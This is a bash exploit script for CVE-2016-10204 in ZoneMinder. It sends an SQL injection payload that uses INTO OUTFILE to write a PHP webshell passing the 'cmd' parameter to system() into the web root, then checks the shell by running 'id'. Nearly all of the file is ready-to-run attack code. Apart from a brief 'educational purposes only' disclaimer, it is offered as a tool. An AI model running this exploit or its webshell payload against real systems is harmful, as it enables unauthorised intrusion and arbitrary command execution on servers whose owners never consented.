#!/bin/bash


#=============================================
#A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint, leading to upload of a php webshell.

#More information on this CVE can be found at these sources:
#
#https://nvd.nist.gov/vuln/detail/CVE-2016-10204
#https://www.exploit-db.com/exploits/41239
#https://www.openwall.com/lists/oss-security/2017/02/05/1

#More information:
#- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
#- https://www.exploit-db.com/exploits/41239
#- https://www.openwall.com/lists/oss-security/2017/02/05/1
#
#Usage:
#  ./CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>
#
#Example:
#  ./CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
#
#Notes:
#- Verifies if a webshell already exists before attempting exploitation.
#- Constructs a malicious SQLi payload to write a PHP webshell into /var/www/html.
#- Confirms deployment by executing 'id' via the ?cmd= parameter.

#Please use responsibly only against devices you have permission to do. This is for educational purposes only.

#=============================================

# Banner and Help

#=============================================


/bin/echo -e "\n[+]================================[+]"
/bin/echo "[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]"
/bin/echo "[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]"
/bin/echo "[+]================================[+]"
/bin/sleep 1


show_help() {
  cat <<'EOF'
CVE-2016-10204_Webshell
A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint,
leading to upload of a php webshell.

More information:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Usage:
  /bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>

Example:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Notes:
- Verifies if a webshell already exists before attempting exploitation.
- Constructs a malicious SQLi payload to write a PHP webshell into /var/www/html.
- Confirms deployment by executing 'id' via the ?cmd= parameter.
- Please use responsibly only against devices you have permission to do. This is for educational purposes only.
EOF
}

# If user asks for help
if [[ "$1" == "--help" || "$1" == "-h" ]]; then
  show_help
  exit 0
fi

#=============================================

#Script Vars

#=============================================

# Target Definition and Checks

#=============================================

webshell_url_suffix="$1"
webshell="SELECT \"<?php system(\$_GET['cmd']);?>\" INTO OUTFILE \"/var/www/html/webshell_$webshell_url_suffix.php\""
ws_payload="view=request&request=log&task=query&limit=100;$webshell#&minTime=1466674406.084434"

base_url="$2"
if [[ "$base_url" =~ ^(http|https)://[^/]+/zm/index\.php$ ]]; then
	host_adr="$(/bin/echo "$base_url" | /bin/awk -F [/:] '{if ($5 ~ /^[0-9]+$/) print $4":"$5; else print $4}')"
        /bin/echo -e "\n[*]================================[*]"
        /bin/echo "[*]Target Host: $host_adr          [*]"
        /bin/echo "[*]Target Endpoint: $base_url      [*]"
        /bin/echo -e "[*]================================[*]\n"
else
        base_url="http://127.0.0.1:80/zm/index.php"
        host_adr="$(/bin/echo "$base_url" | /bin/awk -F [/:] '{if ($5 ~ /^[0-9]+$/) print $4":"$5; else print $4}')"
        /bin/echo -e "\n[x]================================[x]"
        /bin/echo "[x]Target not defined correctly!   [x]"
        /bin/echo "[x]Using below default targets:    [x]"
        /bin/echo "[x]Target Host: $host_adr          [x]"
        /bin/echo "[x]Target Endpoint: $base_url      [x]"
        /bin/echo -e "[x]================================[x]\n"
fi
#=============================================



#=============================================

# Session Headers and Cookies

#=============================================

# Session cookies - adjustable
cookies="zmSkin=classic; zmCSS=classic; ZMSESSID=h7fg4qb187di7ttq9p8d7ilr74"

# Common headers - adjustable
headers=(
  -H "Host: $host_adr"
  -H "Cache-Control: max-age=0"
  -H "DNT: 1"
  -H "Upgrade-Insecure-Requests: 1"
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  -H "Accept-Encoding: gzip, deflate, br"
  -H "Accept-Language: en-US,en;q=0.9"
  -H "Connection: keep-alive"
  -H "Content-Type: application/x-www-form-urlencoded"
  -H "Content-Length: 158"
)

#=============================================



#=============================================

# SQL Injection and Verification

#=============================================

insert_webshell() {
	#First check to make sure it does not already exist
	local ws_url_suffix="$1"
	local ws_url="http://$host_adr/webshell_$ws_url_suffix.php?cmd=id"
	local ws_url_chk=$(/bin/curl -s -o /dev/null -w "%{http_code}" "$ws_url")
	if [ "$ws_url_chk" -eq 200 ]; then
		/bin/echo -e "\n[*]================================[*]"
		/bin/echo "[*]Webshell already deployed.      [*]"
		/bin/echo "[*]================================[*]"
		/bin/curl "$ws_url"
		/bin/echo "[*] $ws_url [*]"
		/bin/echo "[*] Execution is available via the ?cmd= parameter [*]"
		/bin/echo -e "[*]================================[*]\n"
	else
		/bin/echo -e "\n[*]================================[*]"
		/bin/echo "[*]Attempting webshell deployment. [*]"
		/bin/echo "[*]================================[*]"
		/bin/timeout 10s /bin/curl -X POST "${headers[@]}" -b "$cookies" --data-binary "$ws_payload" "$base_url"
		/bin/echo "Exit Code for Timeout: $?"
		local ws_url_chk_2=$(/bin/curl -s -o /dev/null -w "%{http_code}" "$ws_url")
		if [ "$ws_url_chk_2" -eq 200 ]; then
			/bin/echo -e "\n[*]================================[*]"
			/bin/echo "[*]Webshell deployment successful. [*]"
			/bin/echo "[*]================================[*]"
			/bin/curl "$ws_url"
			/bin/echo "[*] $ws_url [*]"
			/bin/echo "[*] Execution is available via the ?cmd= parameter [*]"
			/bin/echo -e "[*]================================[*]\n"

		else
			/bin/echo -e "\n[x]================================[x]"
			/bin/echo "[x]Webshell deployment unsuccessful[x]"
			/bin/echo -e "[x]================================[x]\n"
		fi
	fi

}
#=============================================




#=============================================

# Function Run

#=============================================
insert_webshell "$webshell_url_suffix"
exit 0
#=============================================
